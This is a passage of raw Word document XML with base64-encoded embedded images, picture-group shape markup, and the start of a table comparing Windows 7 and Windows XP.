6gWNcr15t3FfonKLjG1bQ90FS4tXUE+nz/TcZwb&#10;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&#10;AIQCAAA/fQAAAAA=&#10;">
                <v:shape id="Picture 9139" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:14655;top:241;width:12288;height:73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Y/ldPHAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO+F/oflFXqrm9giGl1DEYUW&#10;LRj14PGRfSax2bdLdqvx33cLQo/DzHzDzPLetOJCnW8sK0gHCQji0uqGKwWH/eplDMIHZI2tZVJw&#10;Iw/5/PFhhpm2Vy7osguViBD2GSqoQ3CZlL6syaAfWEccvZPtDIYou0rqDq8Rblo5TJKRNNhwXKjR&#10;0aKm8nv3YxRsvj6HG/fm/PbYtwUnp/NquT4r9fzUv09BBOrDf/je/tAKJunrBP7exCcg57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BY/ldPHAAAA3QAAAA8AAAAAAAAAAAAA&#10;AAAAnwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACTAwAAAAA=&#10;">
                  <v:imagedata r:id="rId29" o:title=""/>
                </v:shape>
                <v:shape id="Picture 466" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:43742;top:477;width:5124;height:51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Xv0iHHAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj91qwkAUhO8F32E5gne6scQgqatIS6Qg&#10;pfhTSu+O2WMSmz0bstuYvn23UPBymJlvmOW6N7XoqHWVZQWzaQSCOLe64kLB6ZhNFiCcR9ZYWyYF&#10;P+RgvRoOlphqe+M9dQdfiABhl6KC0vsmldLlJRl0U9sQB+9iW4M+yLaQusVbgJtaPkRRIg1WHBZK&#10;bOippPzr8G0UZMXmOI+zt8+z/5Bb+Vo9v+/MVanxqN88gvDU+3v4v/2iFcRJAn9nwhGQq1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Xv0iHHAAAA3AAAAA8AAAAAAAAAAAAA&#10;AAAAnwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACTAwAAAAA=&#10;">
                  <v:imagedata r:id="rId30" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9142" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:42564;top:241;width:12319;height:73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xn3EAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj91qAjEUhO8LvkM4gnc160+LrkaRgqBg&#10;L9b6AIfNcbO4OVmS1F3f3hQKXg4z8w2z3va2EXfyoXasYDLOQBCXTtdcKbj87N8XIEJE1tg4JgUP&#10;CrDdDN7WmGvXcUH3c6xEgnDIUYGJsc2lDKUhi2HsWuLkXZ23GJP0ldQeuwS3jZxm2ae0WHNaMNjS&#10;l6Hydv61Cmp6+O9+tgxF0c1ORSs/bmZxVGo07HcrEJH6+Ar/tw9awXIyn8Lfm/QE5OYJ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xn3EAAAA3QAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9140" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:-44;top:-44;width:12318;height:73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0u/9fAAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxET8mqwjAU3T/wH8IV3D1ThydajSKCA2/n&#10;hNtLc22LzU1pom3/3iwEl4czL1aNKcSLKpdbVjDoRyCIE6tzThVcztvfKQjnkTUWlklBSw5Wy87P&#10;AmNtaz7S6+RTEULYxagg876MpXRJRgZd35bEgbvbyqAPsEqlrrAO4aaQwyiaSIM5h4YMS9pklDxO&#10;T6OA/uh8e5jJcXsd7Udp+7+r28tOqV63Wc9BeGr8V/xxH7SC2WAc9oc34QnI5R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bS7/18AAAADdAAAADwAAAAAAAAAAAAAAAACfAgAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAIwDAAAAAA==&#10;">
                  <v:imagedata r:id="rId32" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9141" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:29102;top:241;width:12319;height:73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Ux/OfFAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO+C/2F5Qm+6SS2i0VVEKtRb&#10;tR709sg+s9Hs25BdTfz33YLQ4zAz3zCLVWcr8aDGl44VpKMEBHHudMmFguPPdjgF4QOyxsoxKXiS&#10;h9Wy31tgpl3Le3ocQiEihH2GCkwIdSalzw1Z9CNXE0fv4hqLIcqmkLrBNsJtJd+TZCItlhwXDNa0&#10;MZTfDner4J5eTudJcrzuQrsxY31uP79nhVJvg249BxGoC//hV/tLK5ilHyn8vYlPQC5/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lMfznxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId33" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="87"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9017" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="95" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2319"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2014"/>
        <w:gridCol w:w="2366"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>Win 7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>Win XP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
